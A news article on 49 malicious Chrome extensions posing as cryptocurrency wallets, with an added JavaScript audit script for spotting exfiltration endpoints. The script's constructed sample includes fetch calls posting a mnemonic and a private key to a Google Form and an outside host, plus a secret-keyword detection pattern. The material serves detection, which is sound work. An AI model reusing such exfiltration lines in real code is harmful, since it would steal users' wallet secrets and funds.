Google Removed Malicious Chrome Extensions Mimicking Cryptocurrency Wallet Apps

  • Google has removed 49 Chrome extensions from its Web Store that posed as legitimate cryptocurrency wallet apps but carried malicious code that stole crypto-wallet private keys, prompt phrases, and other core secrets.
  • All 49 extensions perform the same action; they differ only in branding, which depends on the users they target.
  • These malicious extensions work in almost the same manner as the original ones.

Google has recently removed 49 Chrome extensions from its Web Store that posed as legitimate cryptocurrency wallet apps but carried malicious code that stole crypto-wallet private keys, prompt phrases, and other core secrets.

Malicious Cryptocurrency Wallet Extensions Work Almost the Same as the Original Ones

Harry Denley, Director of Security at the MyCrypto platform, exposed the 49 extensions. According to him, they appear to have been uploaded by the same person or group, and a Russian-based threat actor is assumed to be behind them.

All 49 extensions perform the same action; they differ only in branding, which depends on the users they target.

Denley added that the malicious extensions impersonate well-known crypto wallet apps such as Ledger, Electrum, Jaxx, MetaMask, KeepKey, and many more. They work in almost the same manner as the original ones.

Any information entered by the user during the configuration process is sent to one of the attacker’s servers or to a Google Form. The theft itself does not happen at the same moment: as a test, Denley entered the credentials of a test account into one of the malicious extensions, but the funds were not stolen.
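One way a reviewer could check an unpacked extension for the behaviour described above, as an added example that is not from the original article or from Denley's research: it lists every URL in the extension's scripts that points to a Google Form or to a host outside an allowlist. The allowlist, file names, hosts and sample sources are constructed assumptions.

```javascript
// Added example: static audit of an unpacked extension's scripts for
// outbound endpoints. All names, hosts and sample sources are constructed.

// Hosts the genuine wallet is expected to contact (assumption: set by the reviewer).
const ALLOWED_HOSTS = new Set(["api.wallet.example"]);

// Matches http(s) URLs embedded in script text, stopping at quotes or whitespace.
const URL_RE = /https?:\/\/[^\s"'`<>)\\]+/g;

// Identifiers that suggest wallet secrets are handled in the file (heuristic list).
const SECRET_HINTS = /\b(seed|mnemonic|private[_-]?key|passphrase|keystore)\b/i;

// Returns a finding for a suspicious destination, or null if the URL is expected.
function classify(urlText) {
  let u;
  try { u = new URL(urlText); } catch { return null; }
  const host = u.hostname.toLowerCase();
  if (host === "docs.google.com" && u.pathname.startsWith("/forms/")) {
    return { host, reason: "google-form" };
  }
  if (!ALLOWED_HOSTS.has(host)) return { host, reason: "unlisted-host" };
  return null;
}

// files: object mapping file name -> script source text.
function auditExtension(files) {
  const findings = [];
  for (const [name, source] of Object.entries(files)) {
    const touchesSecrets = SECRET_HINTS.test(source);
    for (const match of source.matchAll(URL_RE)) {
      const verdict = classify(match[0]);
      if (verdict) findings.push({ file: name, url: match[0], ...verdict, touchesSecrets });
    }
  }
  return findings;
}

// Constructed sample: two scripts from a hypothetical unpacked extension.
const SAMPLE = {
  "background.js": 'fetch("https://api.wallet.example/v1/balance");',
  "setup.js": [
    'const body = new URLSearchParams({ "entry.1": mnemonic });',
    'fetch("https://docs.google.com/forms/d/e/FORM_ID_PLACEHOLDER/formResponse", { method: "POST", body });',
    'fetch("https://collector.example.net/save", { method: "POST", body: JSON.stringify({ private_key: key }) });',
  ].join("\n"),
};

console.log(auditExtension(SAMPLE));
```

A finding with `touchesSecrets` set deserves manual review first, since the same file both handles key material and contacts an unexpected destination.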

The attacker is interested in stealing funds from high-value accounts

Denley suspects that the attacker is interested in stealing funds only from high-value accounts, or that the attacker does not know how to automate the thefts and accesses every account manually.

Denley has connected some incidents reported by victims to some of the 49 extensions he has recently been tracing. The victims have not yet recovered any of the stolen funds. Furthermore, more malicious extensions are expected to appear in the Web Store in the coming months.

The researcher is appealing to victims to file reports if they believe their wallets were hacked or their funds lost because of Chrome extensions.
